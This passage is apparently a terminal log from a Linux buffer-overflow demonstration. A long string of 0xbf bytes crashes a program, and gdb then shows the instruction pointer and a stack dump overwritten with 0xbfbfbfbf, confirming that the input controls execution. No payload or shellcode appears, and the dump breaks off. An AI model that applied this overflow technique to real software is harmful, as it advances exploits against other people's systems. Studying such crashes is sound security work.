¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[troll@localhost troll]$ gdb -c core 
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/100 $esp
0xbfffd440: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd450: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd460: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd470: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd480: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd490: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd4a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd4b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd4c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd4d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd4e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd4f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd500: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd510: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd520: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd530: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd540: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd550: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd560: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd570: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd580: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd590: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd5a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd5b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd5c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbfffd5d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd5e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd5f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd600: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd610: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd620: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd630: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd640: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd650: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd660: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd670: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd680: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd690: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd6a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd6b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd6c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd6d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd6e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd6f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd700: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd710: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd720: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd730: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd740: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd750: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbfffd760: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd770: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd780: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd790: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd7a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd7b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd7c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd7d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd7e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd7f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd800: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd810: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd820: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd830: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd840: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd850: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd860: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd870: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd880: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd890: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd8a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd8b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd8c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd8d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd8e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbfffd8f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd900: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd910: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd920: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd930: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd940: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffd950: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
